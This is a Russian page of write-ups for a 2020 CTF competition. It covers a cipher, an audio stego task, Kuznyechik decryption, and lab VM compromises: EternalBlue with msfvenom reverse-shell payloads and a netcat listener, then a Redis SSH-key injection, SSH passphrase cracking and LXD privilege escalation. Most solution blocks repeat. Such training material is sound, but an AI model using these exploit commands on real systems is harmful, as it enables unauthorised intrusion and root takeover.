ЗАДАНИЯ CTF СОРЕВНОВАНИЙ ЭШЕЛОНИРОВАННАЯ ОБОРОНА 2020
Для просмотра решения нажмите на кнопку "Показать решение"
ЗАДАНИЯ CTF СОРЕВНОВАНИЙ ЭШЕЛОНИРОВАННАЯ ОБОРОНА 2020
Для просмотра решения нажмите на кнопку "Показать решение"
ЗАДАНИЯ CTF СОРЕВНОВАНИЙ ЭШЕЛОНИРОВАННАЯ ОБОРОНА 2020
Для просмотра решения нажмите на кнопку "Показать решение"
Задача
Показать решение
Задача
Crypto_easy 100
Ссылка на задание: https://cloud.cnpo.ru/s/5S9JNmwsQK99d8k
Описание: Найдите ключ.
Формат ответа: flag{a-Z0-9!@#}
Скачайте вложение.
Показать решение
По наличию разделителей определяем, что это разновидность шифров замены.
Индекс совпадения равен 0.06709 (близко к значению 0.0667), то есть аналогично не зашифрованному сообщению (индекс не зашифрованного сообщения для английского языка 0.0667).
Сообщение, вероятно, подверглось транспонированию или моно-алфавитной замене. Воспользуемся инструментом https://www.dcode.fr/monoalphabetic-substitution.
Определили как Аффинный шифр, восстанавливаем регистр флага.
Искомый флаг: flag{EasyCryptoAlgoritm}
Индекс совпадения равен 0.06709 (близко к значению 0.0667), то есть аналогично не зашифрованному сообщению (индекс не зашифрованного сообщения для английского языка 0.0667).
Сообщение, вероятно, подверглось транспонированию или моно-алфавитной замене. Воспользуемся инструментом https://www.dcode.fr/monoalphabetic-substitution.
Определили как Аффинный шифр, восстанавливаем регистр флага.
Искомый флаг: flag{EasyCryptoAlgoritm}
Задача
Показать решение
Задача
Stego_cyberdemon 100
Ссылка на задание: https://cloud.cnpo.ru/s/93k65CygZLjYjJ3
Описание: Найдите ключ.
Формат ответа: flag{a-Z0-9!@#} Скачайте вложение.
Показать решение
Известные факты:
— Это задание на сокрытие информации в другой информации;
— Крайне большой вес и странные свойства;
— Формат .wav;
— Название cyberdemon
— отсылка на аудио-спектр.
Принимая во внимание все факты, сначала проверяем целостность файла, формат, аудио-спектр.
Sonic Visualiser не может открыть данный файл, что говорил о нецелостности или наличия вложений.
Таким образом, формат действительно .wav и скорее всего содержит вложение.
Инструменты поддерживающие .wav:
— AudioStego;
— spectrology;
— Steghide;
— stegpy;
— DeepSound.
В cyberdemon.wav содержался архив с Cyberdemon.wav с длительностью 3,73 секунды и очень большим битрейтом.
Проверим инструментом Sonic Visualiser аудио-спектр полученного файла.
Окно спектрограммы добавляется нажатием «G» или Окно→Добавить спектрограмму.
Искомый флаг: flag{5ORRy}
— Это задание на сокрытие информации в другой информации;
— Крайне большой вес и странные свойства;
— Формат .wav;
— Название cyberdemon
— отсылка на аудио-спектр.
Принимая во внимание все факты, сначала проверяем целостность файла, формат, аудио-спектр.
Sonic Visualiser не может открыть данный файл, что говорил о нецелостности или наличия вложений.
Таким образом, формат действительно .wav и скорее всего содержит вложение.
Инструменты поддерживающие .wav:
— AudioStego;
— spectrology;
— Steghide;
— stegpy;
— DeepSound.
В cyberdemon.wav содержался архив с Cyberdemon.wav с длительностью 3,73 секунды и очень большим битрейтом.
Проверим инструментом Sonic Visualiser аудио-спектр полученного файла.
Окно спектрограммы добавляется нажатием «G» или Окно→Добавить спектрограмму.
Искомый флаг: flag{5ORRy}
Задача
Показать решение
Задача
Crypto-kuznec 200
Ссылка на задание: https://cloud.cnpo.ru/s/oHN3qKoLmnrWCA2
Описание: Найдите ключ.
Формат ответа: flag{a-Z0-9!@#}
Скачайте вложение.
Показать решение
Известные факты:
— Есть ключ и шифртекст;
— Шифр текст длинной 16*8 = 128 бит, ключ 32*8 = 256 бит;
— В ключ и в названии присутствует «Кузнечик».
Данные указывают на https://tc26.ru/standard/gost/GOST_R_3412-2015.pdf
Таким образом, можно или самостоятельно реализовать отечественный криптоалгоритм, или найти реализацию.
https://www.cyberforum.ru/csharp-beginners/thread2154102.html
Или тут https://habr.com/ru/post/266359/
В обоих ссылка на https://github.com/mjosaarinen/kuznechik
git clone https://github.com/mjosaarinen/kuznechik cd kuznechik/ make ./xtest
Реализация работает, подставляем исходные данные в код main.c
Но сначала преобразуем ключ в Hex-вид.
https://gchq.github.io/CyberChef/#recipe=To_Hex(‘0x%20with%20comma’,0)&input=a1VaTmU0ZUtfSSRrQGxfUGxAaU5URXhUX0JfVHJAdkU
Так же необходимо поменять порядок выполнения функций на обратный.
58 строку
x.b[i] = testvec_pt[i];
заменить на
x.b[i] = testvec_ct[i];
Поменять местами 59 и 64 строки, 51 и 74 строки, 62 и 75 строки.
Сохраняем, собираем, запускаем.
Проверяем полученный флаг: https://gchq.github.io/CyberChef/#recipe=From_Hex(‘Space’)&input=NjYgNkMgNjEgNjcgN0IgNjMgNzIgNTkgNzAgNTQgNEYgNjcgNTIgNjEgNDYgN0Q
Искомый флаг: flag{crYpTOgRaF}
— Есть ключ и шифртекст;
— Шифр текст длинной 16*8 = 128 бит, ключ 32*8 = 256 бит;
— В ключ и в названии присутствует «Кузнечик».
Данные указывают на https://tc26.ru/standard/gost/GOST_R_3412-2015.pdf
Таким образом, можно или самостоятельно реализовать отечественный криптоалгоритм, или найти реализацию.
https://www.cyberforum.ru/csharp-beginners/thread2154102.html
Или тут https://habr.com/ru/post/266359/
В обоих ссылка на https://github.com/mjosaarinen/kuznechik
git clone https://github.com/mjosaarinen/kuznechik cd kuznechik/ make ./xtest
Реализация работает, подставляем исходные данные в код main.c
Но сначала преобразуем ключ в Hex-вид.
https://gchq.github.io/CyberChef/#recipe=To_Hex(‘0x%20with%20comma’,0)&input=a1VaTmU0ZUtfSSRrQGxfUGxAaU5URXhUX0JfVHJAdkU
Так же необходимо поменять порядок выполнения функций на обратный.
58 строку
x.b[i] = testvec_pt[i];
заменить на
x.b[i] = testvec_ct[i];
Поменять местами 59 и 64 строки, 51 и 74 строки, 62 и 75 строки.
Сохраняем, собираем, запускаем.
Проверяем полученный флаг: https://gchq.github.io/CyberChef/#recipe=From_Hex(‘Space’)&input=NjYgNkMgNjEgNjcgN0IgNjMgNzIgNTkgNzAgNTQgNEYgNjcgNTIgNjEgNDYgN0Q
Искомый флаг: flag{crYpTOgRaF}
Задача
Показать решение
Задача
Win7_user 50 и win7_root 50
Ссылка на задание: https://cloud.cnpo.ru/s/WaKM9mYswnxLC7T
Описание: Получите root права, используя Виртуальную машину.
Формат ответа: flag{a-Z0-9!@#}
Примечание. В ходе выполнения задания на соревнованиях 2020 года, IP-адрес был статическим и уникальным для каждой команды. В случае решения задания после мероприятия рекомендуется решать в virtualbox в режиме внутреннего виртуального адаптера или сетевого моста, если вы одни в сети.
Ссылка на задание: https://cloud.cnpo.ru/s/WaKM9mYswnxLC7T
Описание: Получите root права, используя Виртуальную машину.
Формат ответа: flag{a-Z0-9!@#}
Примечание. В ходе выполнения задания на соревнованиях 2020 года, IP-адрес был статическим и уникальным для каждой команды. В случае решения задания после мероприятия рекомендуется решать в virtualbox в режиме внутреннего виртуального адаптера или сетевого моста, если вы одни в сети.
Показать решение
1) Сканирование
Masscan
sudo masscan -e enp6s0 -p1-65535,U:1-65535 10.0.5.52 —rate=500
Nmap
sudo nmap -A -p T:135,139,445,5357,49152-49158,U:137 10.0.5.52
Так как это Windows 7 SP1 проверяем smb на предмет уязвимости к EternalBlue (MS17-010).
nmap -p445 —script smb-vuln-ms17-010 10.0.5.52
2a) Эксплуатация через metasploit
msfconcole
seacrh ms17
use
exploit/windows/smb/ms17_010_eternalblue
set rhost 10.0.5.52
Таким образом ответ: flag{NxnIGdaajHrCSCX}
3) Root:
Таким образом ответ: flag{6nRhwQeeGxOoS4b}
2b) Решение без metasploit
Ссылка на эксплоит: https://github.com/worawit/MS17-010
git clone
https://github.com/worawit/MS17-010.git
Преобразование шелл-код в двоичный файл.
Вы можете сделать либо один (в зависимости от архитектуры, на которой работает ваша цель), либо собрать оба и объединить их в один двоичный файл.
Последнее полезно, когда вы не знаете целевую арку или планируете запустить ее в нескольких системах с разными архитектурами.
Соберите шелл-код ядра с помощью nasm, полезную загрузку с помощью msfvenom и формируем один бинарный файл.
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp LPORT=4444 LHOST=10.0.4.109 —platform windows -a x64 —format raw -o sc_x64_payload.bin
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
Аналогично для x86:
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.0.50.10 —platform windows -a x86 —format raw -o sc_x86_payload.bin
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
Слияние двоичных файлов:
Этот шаг необходим только тогда, когда вы хотите, чтобы и x64, и x86 были в одном двоичном файле.
Предполагая, что вы выполнили описанные выше шаги для каждой архитектуры; слияние выполняется включенным eternalblue_sc_merge.py скриптом:
python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
Запуск эксплойта
python eternalblue_exploit7.py 10.0.5.52 sc_all.bin
В новом окне терминала открываем порт 4444 командой
sudo nc -lvnp 4444
Повторяем запуск эксплойта.
Находим флаги user.txt и root.txt.
Masscan
sudo masscan -e enp6s0 -p1-65535,U:1-65535 10.0.5.52 —rate=500
Nmap
sudo nmap -A -p T:135,139,445,5357,49152-49158,U:137 10.0.5.52
Так как это Windows 7 SP1 проверяем smb на предмет уязвимости к EternalBlue (MS17-010).
nmap -p445 —script smb-vuln-ms17-010 10.0.5.52
2a) Эксплуатация через metasploit
msfconcole
seacrh ms17
use
exploit/windows/smb/ms17_010_eternalblue
set rhost 10.0.5.52
Таким образом ответ: flag{NxnIGdaajHrCSCX}
3) Root:
Таким образом ответ: flag{6nRhwQeeGxOoS4b}
2b) Решение без metasploit
Ссылка на эксплоит: https://github.com/worawit/MS17-010
git clone
https://github.com/worawit/MS17-010.git
Преобразование шелл-код в двоичный файл.
Вы можете сделать либо один (в зависимости от архитектуры, на которой работает ваша цель), либо собрать оба и объединить их в один двоичный файл.
Последнее полезно, когда вы не знаете целевую арку или планируете запустить ее в нескольких системах с разными архитектурами.
Соберите шелл-код ядра с помощью nasm, полезную загрузку с помощью msfvenom и формируем один бинарный файл.
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp LPORT=4444 LHOST=10.0.4.109 —platform windows -a x64 —format raw -o sc_x64_payload.bin
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
Аналогично для x86:
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.0.50.10 —platform windows -a x86 —format raw -o sc_x86_payload.bin
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
Слияние двоичных файлов:
Этот шаг необходим только тогда, когда вы хотите, чтобы и x64, и x86 были в одном двоичном файле.
Предполагая, что вы выполнили описанные выше шаги для каждой архитектуры; слияние выполняется включенным eternalblue_sc_merge.py скриптом:
python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
Запуск эксплойта
python eternalblue_exploit7.py 10.0.5.52 sc_all.bin
В новом окне терминала открываем порт 4444 командой
sudo nc -lvnp 4444
Повторяем запуск эксплойта.
Находим флаги user.txt и root.txt.
Задача
Показать решение
Задача
Writeup Redis_user/root 200+200
Ссылка на образ: https://cloud.cnpo.ru/s/kYtyAyG62kgGnkW
Описание: Задание с VM. redis_user, redis_root
Формат ответа: flag{a-Z0-9!@#}
Примечание. В ходе выполнения задания на соревнованиях 2020 года, IP-адрес был статическим и уникальным для каждой команды. В случае решения задания после мероприятия рекомендуется решать в virtualbox в режиме внутреннего виртуального адаптера или сетевого моста, если вы одни в сети.
Ссылка на образ: https://cloud.cnpo.ru/s/kYtyAyG62kgGnkW
Описание: Задание с VM. redis_user, redis_root
Формат ответа: flag{a-Z0-9!@#}
Примечание. В ходе выполнения задания на соревнованиях 2020 года, IP-адрес был статическим и уникальным для каждой команды. В случае решения задания после мероприятия рекомендуется решать в virtualbox в режиме внутреннего виртуального адаптера или сетевого моста, если вы одни в сети.
Показать решение
1) Сканирование
sudo nmap -A -p- 172.28.128.13
После сканирования можно заметить ssh и redis, обычно ssh поздних версий долго ломаются, следовательно изучаем redis 4.0.9 версии.
Согласно https://book.hacktricks.xyz/pentesting/6379-pentesting-redis, извлекаем более подробную информацию с помощью команд
nmap —script redis-info -sV -p 6379 172.28.128.13
nc -vn 172.28.128.13 6379
redis-cli -h 172.28.128.13
Командой CONFIG GET * запрашиваем текущую конфигурацию сервера.
Так как web-сервер отсутствует, бесполезно настраивать webshell.
В выводе конфигурации можно заметить домашнюю директорию пользователя Redis (строка 166), что позволяет загрузить ключи SSH.
Командами config get dir и config set dir /var/lib/redis/.ssh
Для https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#ssh необходимо: Сгенерировать пару открытого и закрытого ключей ssh командой
ssh-keygen -t rsa
Записать открытый ключ в файл с 2-ми пустыми строками перед ключом и после.
(echo -e «\n\n»; cat ./.ssh/id_rsa.pub; echo -e «\n\n») > redis.txt
не работает на fish!
Импортируем текстовый файл в Redis:
cat redis.txt | redis-cli -h 172.28.128.13 -x set key
Проверяем и сохраняем ключ как «authorized_keys»
redis-cli -h 172.28.128.13
get key
config set dir /var/lib/redis/.ssh
config set dbfilename «authorized_keys»
save
exit
И заходим через пользователя redis по ssh на необходимую машину.
ssh redis@172.28.128.13
Рекомендуем перемещаться по удаленной машине с целью повышения привилегий с помощью https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
Любым из предложенных способов запускаем скрипт.
Необычный для себя файл находиться в директории /opt с названием id_rsa.bak.
В данном случае, это закрытый ключ ssh. Попытаемся подключиться по нему, но требуется passphrase.
Перебираем с помощью john. Преобразовываем id_rsa в hash читаемый john утилитой:
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john —wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Парольная фраза найдена, пытаемся подключиться сначала из вне, затем от redis.
Проверяем предположение, что парольная фраза и является паролем.
Таким образом зашли за нужного пользователя. Получаем флаг.
Таким образом: flag{tn29i9FaLWCJ7oj}
Root:
Для нахождения вектора запускаем linpeas.sh от пользователя.
https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
Собираем образ разработчика на своей машине, запускаем на redis.
#Install requirements
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
go get -d -v github.com/lxc/distrobuilder
#Make distrobuilder
cd
$HOME/go/src/github.com/lxc/distrobuilder
make
cd
#Prepare the creation of alpine
mkdir -p
$HOME/ContainerImages/alpine/
cd
$HOME/ContainerImages/alpine/
wget
https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo
$HOME/go/bin/distrobuilder build-lxd
alpine.yaml
Загружаем полученные контейнеры на уязвимый сервер.
Распаковываем образ:
lxc image import lxd.tar.xz rootfs.squashfs —alias alpine lxc image list
В таблице должен появиться образ alpine.
Создаем контейнер и добавляем путь к root
lxd init (все значения по умолчанию)
lxc init alpine privesc -c security.privileged=true lxc list
Если все успешно, запускаем контейнер.
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
id
Получаем flag{cLZhNbsxR6sLSoJ}
sudo nmap -A -p- 172.28.128.13
После сканирования можно заметить ssh и redis, обычно ssh поздних версий долго ломаются, следовательно изучаем redis 4.0.9 версии.
Согласно https://book.hacktricks.xyz/pentesting/6379-pentesting-redis, извлекаем более подробную информацию с помощью команд
nmap —script redis-info -sV -p 6379 172.28.128.13
nc -vn 172.28.128.13 6379
redis-cli -h 172.28.128.13
Командой CONFIG GET * запрашиваем текущую конфигурацию сервера.
Так как web-сервер отсутствует, бесполезно настраивать webshell.
В выводе конфигурации можно заметить домашнюю директорию пользователя Redis (строка 166), что позволяет загрузить ключи SSH.
Командами config get dir и config set dir /var/lib/redis/.ssh
Для https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#ssh необходимо: Сгенерировать пару открытого и закрытого ключей ssh командой
ssh-keygen -t rsa
Записать открытый ключ в файл с 2-ми пустыми строками перед ключом и после.
(echo -e «\n\n»; cat ./.ssh/id_rsa.pub; echo -e «\n\n») > redis.txt
не работает на fish!
Импортируем текстовый файл в Redis:
cat redis.txt | redis-cli -h 172.28.128.13 -x set key
Проверяем и сохраняем ключ как «authorized_keys»
redis-cli -h 172.28.128.13
get key
config set dir /var/lib/redis/.ssh
config set dbfilename «authorized_keys»
save
exit
И заходим через пользователя redis по ssh на необходимую машину.
ssh redis@172.28.128.13
Рекомендуем перемещаться по удаленной машине с целью повышения привилегий с помощью https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
Любым из предложенных способов запускаем скрипт.
Необычный для себя файл находиться в директории /opt с названием id_rsa.bak.
В данном случае, это закрытый ключ ssh. Попытаемся подключиться по нему, но требуется passphrase.
Перебираем с помощью john. Преобразовываем id_rsa в hash читаемый john утилитой:
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john —wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Парольная фраза найдена, пытаемся подключиться сначала из вне, затем от redis.
Проверяем предположение, что парольная фраза и является паролем.
Таким образом зашли за нужного пользователя. Получаем флаг.
Таким образом: flag{tn29i9FaLWCJ7oj}
Root:
Для нахождения вектора запускаем linpeas.sh от пользователя.
https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
Собираем образ разработчика на своей машине, запускаем на redis.
#Install requirements
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
go get -d -v github.com/lxc/distrobuilder
#Make distrobuilder
cd
$HOME/go/src/github.com/lxc/distrobuilder
make
cd
#Prepare the creation of alpine
mkdir -p
$HOME/ContainerImages/alpine/
cd
$HOME/ContainerImages/alpine/
wget
https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo
$HOME/go/bin/distrobuilder build-lxd
alpine.yaml
Загружаем полученные контейнеры на уязвимый сервер.
Распаковываем образ:
lxc image import lxd.tar.xz rootfs.squashfs —alias alpine lxc image list
В таблице должен появиться образ alpine.
Создаем контейнер и добавляем путь к root
lxd init (все значения по умолчанию)
lxc init alpine privesc -c security.privileged=true lxc list
Если все успешно, запускаем контейнер.
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
id
Получаем flag{cLZhNbsxR6sLSoJ}
Киберпатриот 2020
в цифрах
27 городов России
Соревнования объединили участников со всей страны
Более 450 участников
Более 100 команд
и 3 уровня участников:
юниоры, специалисты и курсанты
Игровая платформа
Соревнования прошли в формате
CTF в offline и online режиме
Эшелонированная оборона 2020
В финальном туре соревнований приняли участие 39 команд, состоящих из учащихся общеобразовательных организаций (категория: «Юниоры»), студентов профильных вузов (категория: «Специалисты») и курсантов вузов Минобороны России (категория: «Курсанты»).
Командам были предложены задания по следующим направлениям:
— Стеганография;
— Криптография;
— Поиск и эксплуатация уязвимостей;
— Администрирование;
— Поиск информации в открытых источниках.
По итогам выполнения каждой задачи, соревнующиеся получали особое значение (флаг), которое впоследствии вносилось в специальную судейскую цифровую платформу.
Официальные партнеры
Организаторы мероприятия:
Департамент информационных систем Министерства обороны Российской Федерации,
Восьмое управление Генерального штаба Вооруженных Сил Российской Федерации.
Контактная информация
Организаторы проекта:
Департамент информационных систем Министерства обороны Российской Федерации,
Восьмое управление Генерального штаба Вооруженных Сил Российской Федерации.
ФГАУ «ВППКиО ВС РФ «Патриот»:
Адрес: Московская область, Одинцовский район, 55 км Минского шоссе (парк)
Единый справочный телефон:
8 (800) 707-01-07
© Разработка сайта НПО «Эшелон», 2019-2021